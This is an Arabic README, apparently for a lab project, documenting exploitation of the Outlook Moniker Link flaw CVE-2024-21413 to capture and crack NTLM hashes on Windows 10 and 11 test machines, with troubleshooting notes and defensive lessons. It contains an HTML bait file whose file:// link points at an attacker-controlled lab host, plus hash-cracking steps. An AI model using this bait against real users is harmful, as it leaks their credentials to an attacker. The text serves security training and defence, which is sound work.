
مختبر اختبار اختراق يوضح استغلال روابط Moniker Link في ثغرة CVE-2024-21413 لسرقة بيانات اعتماد NTLM، بما في ذلك تنفيذ الهجوم وكسر الهاش والتدابير الدفاعية المضادة.
مختبر اختبار اختراق عملي يوضح استغلال ثغرة Moniker Link (CVE-2024-21413) لسرقة بيانات اعتماد NTLM. يوثّق هذا المشروع سلسلة الهجوم الكاملة بدءًا من الإعداد وحتى اختراق بيانات الاعتماد، بما في ذلك التحديات والحلول الواقعية.
الإنجاز الرئيسي: تنفيذ هجوم Moniker Link بنجاح على كلٍّ من بيئة المختبر المعزولة (جهاز Windows 10 افتراضي) والنظام الحقيقي (جهاز Windows 11)، مما يوضح الثغرات الأمنية العملية والإجراءات الدفاعية المضادة.
جهاز الهجوم:
الأنظمة المستهدفة:
إعدادات الشبكة:
ملف HTML (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
طريقة مستكشف الملفات:
\\192.168.56.101\test في شريط العنوانالمشكلة:
السبب الجذري:
الحل:
الدرس: يوفر جدار حماية Windows الافتراضي حماية فعّالة ضد هذا الهجوم. يجب على المستخدمين إبقاءه مفعّلًا.
المشكلة:
nwigwecj112Honey (كلمة مرور خاطئة!)12Honey من اختبار سابقالسبب الجذري:
~/.john/john.potالحل:
1414الدرس: تحقق دائمًا من أنك تكسر التجزئة الصحيحة. امسح ملف pot أو استخدم كلمات مرور فريدة للاختبار.
المشكلة:
1414 غير موجودة في rockyou.txt (14 مليون كلمة مرور)السبب الجذري:
الحل:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
الدرس: عدم وجود كلمة المرور في rockyou.txt لا يعني أنها آمنة. كلمات المرور القصيرة معرضة للهجمات المستهدفة والهجمات بالقوة الغاشمة بغض النظر عن وجودها في قوائم الكلمات.
✅ جدار حماية Windows - حجب الهجوم تمامًا عند تفعيله ✅ المتصفحات الحديثة - Chrome/Edge تحظر روابط file:// عن بُعد ✅ وعي المستخدم - المطالبة اليدوية تتطلب إجراءً من المستخدم
❌ كلمات المرور الضعيفة - الأرقام الأربعة سهلة الكسر ❌ جدار الحماية المعطّل - خطأ شائع من المستخدمين ❌ مستكشف الملفات - لا يوجد تحذير لمسارات UNC ❌ بروتوكول NTLM - مصادقة تلقائية لمشاركات SMB
1. جدار الحماية أمر بالغ الأهمية
2. وهم قوة كلمة المرور
1414 غير موجودة في rockyou.txt (تبدو "قوية")3. يتطلب تفاعل المستخدم
الأدوات الهجومية:
البنية التحتية:
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│ ├── attack-execution.md (step-by-step attack guide)
│ └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)
تقنيًا:
مهنيًا:
تم إجراء جميع الاختبارات على أنظمة مصرح بها:
إشعار قانوني: الوصول غير المصرح به إلى أجهزة الكمبيوتر غير قانوني. هذا المشروع لأغراض تعليمية وبيئات الاختبار المصرح بها فقط.
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a
التاريخ: مارس 2026
للاستخدام التعليمي فقط. ليس للاختبار غير المصرح به.
⭐ إذا وجدت هذا المشروع مفيدًا، يرجى التفكير في منح المستودع نجمة!
| المقياس | النتيجة |
|---|
| كلمة المرور الأولية | nwigwecj1 |
| تم تغييرها إلى | 1414 |
| قائمة الكلمات | مخصصة (مدخلان) |
| زمن الكسر | أقل من ثانية واحدة |
| جدار الحماية | معطّل لأغراض الاختبار |
| الحالة | ✅ تم الاختراق بنجاح |
| المقياس | النتيجة |
|---|
| كلمة المرور | 1414 |
| جدار الحماية | حظر في البداية، ثم تم تعطيله |
| المصادقة | مطالبة يدوية (إدخال بيانات الاعتماد) |
| زمن الكسر | فوري |
| الحالة | ✅ تم الاختراق بنجاح |